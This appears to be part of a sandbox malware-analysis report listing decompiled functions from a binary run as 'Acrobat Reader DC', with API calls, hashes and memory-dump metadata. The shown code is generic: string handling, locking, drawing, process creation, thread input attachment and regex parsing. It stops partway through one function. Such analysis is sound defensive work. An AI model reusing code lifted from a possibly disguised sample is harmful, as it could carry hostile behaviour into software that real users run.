                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                  • Instruction ID: fa6d01852bb983edeafff486d0019367465e9530caf48e469f9bea5953271079
                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                  • Instruction Fuzzy Hash: FE11727250005DFBCF125E85EC41CEE3F22BB28394B9A8416FE1858131C73AC9B1AB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 61%
                                  			E00434963(intOrPtr _a4, intOrPtr _a8) {
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t16;
                                  				void* _t18;
                                  				void* _t27;
                                  				intOrPtr _t28;
                                  				intOrPtr _t41;
                                  				intOrPtr _t43;
                                  				intOrPtr _t46;
                                  
                                  				_t28 = _a8;
                                  				_t43 = _a4;
                                  				_t46 =  *((intOrPtr*)(_t43 + 0x10));
                                  				if(_t46 != 0) {
                                  					_t18 = E004111C1( *((intOrPtr*)( *((intOrPtr*)(_t43 + 0xc)))));
                                  					_push( ~(_t46 > 0) | (E004111C1(_t28) + _t18 + 0x00000001) * 0x00000002);
                                  					_t41 = E004115D7(_t18, _t43,  ~(_t46 > 0) | (E004111C1(_t28) + _t18 + 0x00000001) * 0x00000002);
                                  					E00411567(_t41,  *((intOrPtr*)( *((intOrPtr*)(_t43 + 0xc)))));
                                  					E00411536(_t41, _t28);
                                  					_push( *((intOrPtr*)( *((intOrPtr*)(_t43 + 0xc)))));
                                  					_t27 = E004111DC();
                                  					 *((intOrPtr*)( *((intOrPtr*)(_t43 + 0xc)))) = _t41;
                                  					return _t27;
                                  				}
                                  				return _t16;
                                  			}













                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcslen$_malloc_wcscat_wcscpy
                                  • String ID:
                                  • API String ID: 1597257046-0
                                  • Opcode ID: f11043ad9d67cc5c40085a46a3b7adaa57771fda566fa35e382c82f885712106
                                  • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                  • Opcode Fuzzy Hash: f11043ad9d67cc5c40085a46a3b7adaa57771fda566fa35e382c82f885712106
                                  • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044B5E8(intOrPtr _a4) {
                                  				struct _CRITICAL_SECTION* _t14;
                                  				intOrPtr _t15;
                                  
                                  				_t15 = _a4;
                                  				_t14 = _t15 + 0x14;
                                  				EnterCriticalSection(_t14);
                                  				if(InterlockedExchange(_t15 + 0x34,  *(_t15 + 0x34)) != 0x1f6 ||  *((intOrPtr*)(_t15 + 0xc)) != 0) {
                                  					LeaveCriticalSection(_t14);
                                  					return 1;
                                  				} else {
                                  					LeaveCriticalSection(_t14);
                                  					return 0;
                                  				}
                                  			}






                                  APIs
                                  • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                  • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                  • String ID:
                                  • API String ID: 2223660684-0
                                  • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                  • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                  • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                  • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004472F1(struct HDC__* _a4, int _a8, int _a12, int _a16, int _a20, signed char _a24) {
                                  				void* _t9;
                                  				struct HDC__* _t19;
                                  
                                  				_t19 = _a4;
                                  				if((_a24 & 0x00000002) != 0) {
                                  					E0044719B(_t19, 0, 0xffffffff, 2, 1);
                                  					MoveToEx(_t19, _a8, _a12, 0);
                                  					LineTo(_t19, _a16, _a20);
                                  					if( *0x4a86ec != 0) {
                                  						EndPath(_t19);
                                  						 *0x4a86ec = 0;
                                  					}
                                  					return StrokePath(_t19);
                                  				}
                                  				return _t9;
                                  			}






                                  APIs
                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                  • LineTo.GDI32(?,?,?), ref: 00447326
                                  • EndPath.GDI32(?), ref: 00447336
                                  • StrokePath.GDI32(?), ref: 00447344
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                  • String ID:
                                  • API String ID: 2783949968-0
                                  • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                  • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                  • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                  • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00430B0F(WCHAR* _a4) {
                                  				int _t5;
                                  				void* _t8;
                                  
                                  				E00412F40(0x4a9568, 0, 0x44);
                                  				E00412F40(0x4a9554, 0, 0x10);
                                  				0x4a9568->cb = 0x44;
                                  				 *0x4a9594 = 1;
                                  				 *0x4a9598 = 1;
                                  				_t5 = CreateProcessW(0, _a4, 0, 0, 0, 0x20, 0, 0, 0x4a9568, 0x4a9554);
                                  				if(_t5 != 0) {
                                  					_t8 = 0x4a9554->hProcess; // 0x0
                                  					return CloseHandle(_t8);
                                  				}
                                  				return _t5;
                                  			}






                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memset$CloseCreateHandleProcess
                                  • String ID:
                                  • API String ID: 3277943733-0
                                  • Opcode ID: e088a7bf58335eb6944ed34f3b8eeab294ed842f4155ecbba55165c5b0624384
                                  • Instruction ID: 3470c143a95c0eef1b65460b57efe1f3fa5fad32f127a08d2907f48b6a67c281
                                  • Opcode Fuzzy Hash: e088a7bf58335eb6944ed34f3b8eeab294ed842f4155ecbba55165c5b0624384
                                  • Instruction Fuzzy Hash: DFF01C72BC034476F7259B59DD47F853A689719F48F20002AB7086E1E3C6F9B850D7AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 66%
                                  			E0043646A(struct HWND__* _a4, long _a8) {
                                  				long _t4;
                                  				long _t8;
                                  				struct HWND__* _t9;
                                  
                                  				_t9 = _a4;
                                  				if(_a8 != 1) {
                                  					_push(0);
                                  					L4:
                                  					_t4 = GetWindowThreadProcessId(_t9, 0);
                                  					return AttachThreadInput(GetCurrentThreadId(), _t4, ??);
                                  				}
                                  				_t8 = SendMessageTimeoutW(_t9, 0, 0, 0, 2, 0x1388,  &_a8);
                                  				if(_t8 != 0) {
                                  					_push(1);
                                  					goto L4;
                                  				}
                                  				return _t8;
                                  			}







                                  APIs
                                  • SendMessageTimeoutW.USER32 ref: 00436489
                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                  • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                  • AttachThreadInput.USER32(00000000), ref: 004364AA
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                  • String ID:
                                  • API String ID: 2710830443-0
                                  • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                  • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                  • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                  • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E00436C2B(void** _a4) {
                                  				void** _t16;
                                  
                                  				_t16 = _a4;
                                  				WaitForSingleObject( *_t16, 0xffffffff);
                                  				__imp__UnloadUserProfile(_t16[2], _t16[1]);
                                  				CloseHandle(_t16[2]);
                                  				CloseHandle( *_t16);
                                  				E00436BA9(_t16);
                                  				return 0;
                                  			}





                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                  • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                  • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                  • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                    • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                    • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                  • String ID:
                                  • API String ID: 146765662-0
                                  • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                  • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                  • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                  • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0041514D() {
                                  				void* _t3;
                                  				void* _t6;
                                  				void* _t8;
                                  				void* _t9;
                                  
                                  				_t9 = E004179F0(_t6, _t8);
                                  				if(_t9 != 0) {
                                  					_t3 =  *(_t9 + 4);
                                  					if(_t3 != 0xffffffff) {
                                  						CloseHandle(_t3);
                                  					}
                                  					E00417BB2(_t9);
                                  				}
                                  				ExitThread(0);
                                  			}

                                  APIs
                                  • __getptd_noexit.LIBCMT ref: 00415150
                                    • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                    • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                    • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                    • Part of subcall function 004179F0: __initptd.LIBCMT ref: 00417A3F
                                    • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                    • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                  • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                  • __freeptd.LIBCMT ref: 0041516B
                                  • ExitThread.KERNEL32 ref: 00415173
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit__initptd
                                  • String ID:
                                  • API String ID: 2246029678-0
                                  • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                  • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                  • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                  • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0042F373(signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28) {
                                  				signed char* _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _t82;
                                  				signed int _t83;
                                  				signed char _t85;
                                  				intOrPtr _t86;
                                  				intOrPtr _t88;
                                  				signed char _t89;
                                  				void* _t93;
                                  				signed int _t94;
                                  				signed char _t96;
                                  				signed char _t97;
                                  				signed char _t98;
                                  				void* _t99;
                                  				signed char _t100;
                                  				signed char _t101;
                                  				signed int _t102;
                                  				void* _t105;
                                  				signed char _t107;
                                  				signed char _t108;
                                  				signed int _t109;
                                  				intOrPtr* _t111;
                                  				intOrPtr _t112;
                                  				intOrPtr _t113;
                                  				intOrPtr _t114;
                                  				intOrPtr _t118;
                                  				signed char _t121;
                                  				signed char _t122;
                                  				signed char _t123;
                                  				signed char* _t124;
                                  				signed char _t137;
                                  				intOrPtr _t138;
                                  				intOrPtr _t139;
                                  				signed char* _t140;
                                  				void* _t141;
                                  
                                  				_t111 = _a28;
                                  				_t140 =  *_a4;
                                  				_t82 =  *_t111;
                                  				_t113 = _t82;
                                  				_v8 = _t140;
                                  				_t138 = _a12;
                                  				_v20 = _t113;
                                  				_v12 = _t113;
                                  				_v16 = 0;
                                  				if( *_t140 != 0x28) {
                                  					L35:
                                  					_t139 = _a8;
                                  					if(_t140 >=  *((intOrPtr*)(_t139 + 0x1c))) {
                                  						goto L101;
                                  					} else {
                                  						while(1) {
                                  							_t85 =  *_t140;
                                  							_t114 = _v12;
                                  							if(_t85 != 0x5c) {
                                  								goto L45;
                                  							}
                                  							_t140 =  &(_t140[1]);
                                  							_v8 = _t140;
                                  							_t100 =  *_t140;
                                  							if(_t100 == 0) {
                                  								goto L101;
                                  							} else {
                                  								if(_t100 != 0x51) {
                                  									L96:
                                  									_t140 =  &(_t140[1]);
                                  									_v8 = _t140;
                                  									if(_t140 >=  *((intOrPtr*)(_t139 + 0x1c))) {
                                  										goto L101;
                                  									} else {
                                  										_t111 = _a28;
                                  										continue;
                                  									}
                                  								} else {
                                  									while(1) {
                                  										_t140 =  &(_t140[1]);
                                  										_v8 = _t140;
                                  										_t101 =  *_t140;
                                  										if(_t101 == 0) {
                                  											goto L101;
                                  										}
                                  										if(_t101 != 0x5c) {
                                  											continue;
                                  										} else {
                                  											if(_t101 == 0) {
                                  												goto L101;
                                  											} else {
                                  												_t140 =  &(_t140[1]);
                                  												_v8 = _t140;
                                  												if( *_t140 != 0x45) {
                                  													continue;
                                  												} else {
                                  													goto L96;
                                  												}
                                  											}
                                  										}
                                  										goto L107;
                                  									}
                                  									goto L101;
                                  								}
                                  							}
                                  							goto L107;
                                  							L45:
                                  							if(_t85 != 0x5b) {
                                  								_t125 = _a20;
                                  								if(_a20 == 0 || _t85 != 0x23) {
                                  									if(_t85 != 0x28) {
                                  										if(_t85 == 0x29) {
                                  											if(_v16 != 0 &&  *_t111 < _t114) {
                                  												 *_t111 = _t114;
                                  											}
                                  											goto L101;
                                  										} else {
                                  											if(_t85 == 0x7c && _v16 != 0) {
                                  												_t86 =  *_t111;
                                  												if(_t86 > _t114) {
                                  													_v12 = _t86;
                                  												}
                                  												 *_t111 = _v20;
                                  											}
                                  											goto L96;
                                  										}
                                  									} else {
                                  										_t88 = E0042F373( &_v8, _t139, _a12, _a16, _t125, _a24, _t111);
                                  										_t141 = _t141 + 0x1c;
                                  										if(_t88 > 0) {
                                  											goto L106;
                                  										} else {
                                  											_t140 = _v8;
                                  											if( *_t140 == 0) {
                                  												goto L101;
                                  											} else {
                                  												goto L96;
                                  											}
                                  										}
                                  									}
                                  								} else {
                                  									_t140 =  &(_t140[1]);
                                  									_v8 = _t140;
                                  									_t89 =  *_t140;
                                  									if(_t89 == 0) {
                                  										goto L101;
                                  									} else {
                                  										do {
                                  											_t117 =  *((intOrPtr*)(_t139 + 0x58));
                                  											if( *((intOrPtr*)(_t139 + 0x58)) == 0) {
                                  												_t118 =  *((intOrPtr*)(_t139 + 0x5c));
                                  												if(_t140 >  *((intOrPtr*)(_t139 + 0x1c)) - _t118 || _t89 !=  *((intOrPtr*)(_t139 + 0x60)) || _t118 != 1 && _t140[1] !=  *((intOrPtr*)(_t139 + 0x61))) {
                                  													goto L81;
                                  												} else {
                                  													goto L75;
                                  												}
                                  											} else {
                                  												_t92 =  *((intOrPtr*)(_t139 + 0x1c));
                                  												if(_t140 >=  *((intOrPtr*)(_t139 + 0x1c))) {
                                  													L81:
                                  													_t140 =  &(_t140[1]);
                                  													_v8 = _t140;
                                  													if(_a24 != 0 && ( *_t140 & 0x000000c0) == 0x80) {
                                  														do {
                                  															_t140 =  &(_t140[1]);
                                  															_v8 = _t140;
                                  														} while (( *_t140 & 0x000000c0) == 0x80);
                                  													}
                                  													goto L84;
                                  												} else {
                                  													_t53 = _t139 + 0x5c; // 0x5c
                                  													_t93 = E0042E9B5(_t140, _t117, _t92, _t53, _a24);
                                  													_t141 = _t141 + 0x14;
                                  													if(_t93 == 0) {
                                  														goto L81;
                                  													} else {
                                  														L75:
                                  														_t140 =  &(_t140[ *((intOrPtr*)(_t139 + 0x5c)) - 1]);
                                  														_v8 = _t140;
                                  														if( *_t140 == 0) {
                                  															goto L101;
                                  														} else {
                                  															goto L96;
                                  														}
                                  													}
                                  												}
                                  											}
                                  											goto L107;
                                  											L84:
                                  											_t89 =  *_t140;
                                  										} while (_t89 != 0);
                                  										_t94 = _a4;
                                  										 *_t94 = _t140;
                                  										return _t94 | 0xffffffff;
                                  									}
                                  								}
                                  							} else {
                                  								_t112 = 0;
                                  								while(1) {
                                  									L47:
                                  									_t96 = _t140[1];
                                  									if(_t96 != 0x5c) {
                                  										break;
                                  									}
                                  									_t140 =  &(_t140[2]);
                                  									if( *_t140 != 0x45) {
                                  										_t99 = E00416931(_t114, _t140, "Q\\E", 3);
                                  										_t140 = _v8;
                                  										_t141 = _t141 + 0xc;
                                  										if(_t99 == 0) {
                                  											_t140 =  &(_t140[4]);
                                  											_v8 = _t140;
                                  											continue;
                                  										}
                                  									} else {
                                  										_v8 = _t140;
                                  										continue;
                                  									}
                                  									L55:
                                  									if(_t140[1] == 0x5d && ( *(_t139 + 0x44) & 0x02000000) == 0) {
                                  										_t140 =  &(_t140[1]);
                                  									}
                                  									_t140 =  &(_t140[1]);
                                  									_v8 = _t140;
                                  									_t83 =  *_t140;
                                  									if(_t83 == 0x5d) {
                                  										goto L96;
                                  									} else {
                                  										while(_t83 != 0) {
                                  											if(_t83 != 0x5c) {
                                  												L67:
                                  												_t140 =  &(_t140[1]);
                                  												_v8 = _t140;
                                  												_t83 =  *_t140;
                                  												if(_t83 != 0x5d) {
                                  													continue;
                                  												} else {
                                  													goto L96;
                                  												}
                                  											} else {
                                  												_t140 =  &(_t140[1]);
                                  												_v8 = _t140;
                                  												_t97 =  *_t140;
                                  												if(_t97 == 0) {
                                  													goto L101;
                                  												} else {
                                  													if(_t97 != 0x51) {
                                  														goto L67;
                                  													} else {
                                  														while(1) {
                                  															_t140 =  &(_t140[1]);
                                  															_v8 = _t140;
                                  															_t98 =  *_t140;
                                  															if(_t98 == 0) {
                                  																goto L101;
                                  															}
                                  															if(_t98 != 0x5c) {
                                  																continue;
                                  															} else {
                                  																if(_t98 == 0) {
                                  																	goto L101;
                                  																} else {
                                  																	_t140 =  &(_t140[1]);
                                  																	_v8 = _t140;
                                  																	if( *_t140 != 0x45) {
                                  																		continue;
                                  																	} else {
                                  																		goto L67;
                                  																	}
                                  																}
                                  															}
                                  															goto L107;
                                  														}
                                  														goto L101;
                                  													}
                                  												}
                                  											}
                                  											goto L107;
                                  										}
                                  										goto L102;
                                  									}
                                  									goto L107;
                                  								}
                                  								if(_t112 == 0 && _t96 == 0x5e) {
                                  									_t140 =  &(_t140[1]);
                                  									_t112 = 1;
                                  									_v8 = _t140;
                                  									goto L47;
                                  								}
                                  								goto L55;
                                  							}
                                  							goto L107;
                                  						}
                                  					}
                                  				} else {
                                  					_t121 = _t140[1];
                                  					if(_t121 != 0x2a) {
                                  						if(_t121 == 0x3f) {
                                  							_t122 = _t140[2];
                                  							if(_t122 != 0x7c) {
                                  								if(_t122 != 0x23) {
                                  									_t140 =  &(_t140[2]);
                                  									_v8 = _t140;
                                  									if(_t122 != 0x28) {
                                  										if( *_t140 == 0x50) {
                                  											_t140 =  &(_t140[1]);
                                  											_v8 = _t140;
                                  										}
                                  										_t123 =  *_t140;
                                  										if(_t123 != 0x3c) {
                                  											L23:
                                  											if(_t123 != 0x27) {
                                  												goto L35;
                                  											} else {
                                  												goto L24;
                                  											}
                                  										} else {
                                  											_t137 = _t140[1];
                                  											if(_t137 == 0x21 || _t137 == 0x3d) {
                                  												goto L23;
                                  											} else {
                                  												L24:
                                  												_t88 = _t82 + 1;
                                  												 *_t111 = _t88;
                                  												if(_t138 != 0 || _t88 != _a16) {
                                  													_t102 =  *_t140 & 0x000000ff;
                                  													_t140 =  &(_t140[1]);
                                  													_v8 = _t140;
                                  													if(_t102 == 0x3c) {
                                  														_t102 = 0x3e;
                                  													}
                                  													_t124 = _t140;
                                  													while(( *_t140 & 0x000000ff) != _t102) {
                                  														_t140 =  &(_t140[1]);
                                  														_v8 = _t140;
                                  													}
                                  													if(_t138 == 0 || _a16 != _t140 - _t124) {
                                  														goto L35;
                                  													} else {
                                  														_t105 = E00416931(_t124, _t138, _t124, _a16);
                                  														_t141 = _t141 + 0xc;
                                  														if(_t105 != 0) {
                                  															_t140 = _v8;
                                  															goto L35;
                                  														} else {
                                  															return  *_t111;
                                  														}
                                  													}
                                  												} else {
                                  													goto L106;
                                  												}
                                  											}
                                  										}
                                  									} else {
                                  										if(_t140[1] != 0x3f) {
                                  											_t107 =  *_t140;
                                  											if(_t107 != 0) {
                                  												while(_t107 != 0x29) {
                                  													_t140 =  &(_t140[1]);
                                  													_v8 = _t140;
                                  													_t107 =  *_t140;
                                  													if(_t107 != 0) {
                                  														continue;
                                  													} else {
                                  													}
                                  													goto L35;
                                  												}
                                  												if( *_t140 != 0) {
                                  													goto L17;
                                  												}
                                  											}
                                  										}
                                  										goto L35;
                                  									}
                                  								} else {
                                  									_t140 =  &(_t140[3]);
                                  									_v8 = _t140;
                                  									_t108 =  *_t140;
                                  									if(_t108 == 0) {
                                  										L101:
                                  										_t83 = _a4;
                                  										 *_t83 = _t140;
                                  										L102:
                                  										return _t83 | 0xffffffff;
                                  									} else {
                                  										while(_t108 != 0x29) {
                                  											_t140 =  &(_t140[1]);
                                  											_v8 = _t140;
                                  											_t108 =  *_t140;
